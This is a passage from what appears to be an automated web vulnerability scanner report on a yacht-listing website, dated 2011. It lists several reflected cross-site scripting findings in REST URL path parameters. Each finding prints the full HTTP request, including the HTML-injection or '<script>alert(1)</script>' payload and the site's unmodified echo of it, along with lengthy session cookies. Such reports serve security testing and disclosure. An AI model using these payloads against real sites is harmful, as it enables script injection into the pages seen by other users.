GET /boats/category/typec9545"><a>c24817267c1/Tiara/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:35 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typec9545"><a>c24817267c1/Tiara/1">
...[SNIP]...

3.285. http://www.yachtworld.com/boats/category/type/Tiara/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Tiara/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4cc2"><a>597517bb02b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Tiarad4cc2"><a>597517bb02b/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:42 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Tiarad4cc2"><a>597517bb02b/A-1">
...[SNIP]...

3.286. http://www.yachtworld.com/boats/category/type/Tiara/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Tiara/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c83"><script>alert(1)</script>37635591874 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Tiara/113c83"><script>alert(1)</script>37635591874 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:48 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Tiara/113c83"><script>alert(1)</script>37635591874/A-1">
...[SNIP]...

3.287. http://www.yachtworld.com/boats/category/type/Viking/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Viking/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8139"><a>39ead952a89 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typec8139"><a>39ead952a89/Viking/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

3.288. http://www.yachtworld.com/boats/category/type/Viking/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Viking/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a974"><a>7ac8c1119d3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Viking2a974"><a>7ac8c1119d3/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:37 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Viking2a974"><a>7ac8c1119d3/A-1">
...[SNIP]...

3.289. http://www.yachtworld.com/boats/category/type/Viking/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Viking/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34ab"><script>alert(1)</script>83b3d715e6b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Viking/1a34ab"><script>alert(1)</script>83b3d715e6b HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; 